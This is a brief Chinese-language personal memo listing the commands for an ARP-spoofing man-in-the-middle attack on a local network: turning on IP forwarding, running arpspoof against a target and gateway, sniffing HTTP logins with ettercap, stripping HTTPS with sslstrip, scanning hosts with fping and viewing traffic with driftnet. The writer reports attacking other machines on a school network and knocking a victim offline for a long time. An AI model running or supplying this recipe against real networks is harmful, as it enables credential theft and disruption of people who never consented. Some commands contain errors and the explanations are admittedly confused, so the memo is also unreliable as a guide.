1.开启代理转发
echo 1 >/proc/sys/net/ipv4/ip_forward
echo 0 >/proc/sys/net/ipv4/ip_forwad设置不开启转发
2.开启欺骗
arpspoof -i (网卡) -t 目标ip 网关
(有时实现不了欺骗,只能断网的话,目标ip和网关换一下位置就行,不知道为什么,其实这里换一下位置好像你以为能上网了,但我感觉是因为命令没有生效,实质上并没有监听到流量,不懂!攻击了学校的其他ip,不能实现欺骗,被攻击者断网断了很久,arpspoof命令关掉也不能立即联网,过了好一会儿才能联网)
3.cat /proc/sys/net/ipv4/ip_forward可以查看是否开启转发,回显为1表示开启转发
4.ettercap -Tq -i (网卡)实现嗅探,可以截取http的登录请求
要截取https加密的登录,需要先启动sslstrip -a -f -k
然后再启动ettercap -Tq -i(网卡)实现拦截,但是好像一直不成功,被攻击ip直接上不了网,所有网页都变成经过https加密
5.查看当前局域网内ip
fping -msg 192.168.1.0/24(把自己ip的第四位改为0,这里不是很懂)
6.driftnet -i (网卡)可查看经过网卡的流量